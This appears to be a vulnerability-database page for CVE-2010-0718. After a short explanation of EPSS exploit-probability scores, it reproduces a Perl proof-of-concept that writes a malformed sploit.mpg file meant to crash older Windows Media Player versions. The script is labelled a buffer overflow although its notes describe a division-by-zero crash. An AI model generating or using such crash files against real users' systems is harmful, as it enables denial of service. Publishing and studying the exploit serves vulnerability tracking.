CVE-2010-0718 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl # Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit # Homepage: www.microsoft.com # Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg> # From: Indonesia # #################################################### # Testing Results: #################################################### # Bug: Integer Division By Zero # Platform: Windows XP SP3 ENG # Tested versions: # 1. Windows Media Player 9 = crash # 2. Windows Media Player 11.0.5721 = crash # 3. Windows Media Player 11.0.6 = No crash #################################################### # #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # WARNING - WARNING - WARNING - WARNING #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # # # Disclaimer: The author published the information under the condition # that is not in the intention of the reader to use them in order to bring # to himself or others a profit or to bring to others damage. # # # Gr33tz: No Thanks print " [+]---------------------------------------------------------------------[+] [+] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [+] [+] By : cr4wl3r [+] [+]---------------------------------------------------------------------[+] "; $buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; open(file, "> sploit.mpg"); print (file $buff); print "\n\n[+] Done...!!!\n [+] Open with Windows Media Player\n [+] Coded by cr4wl3r\n";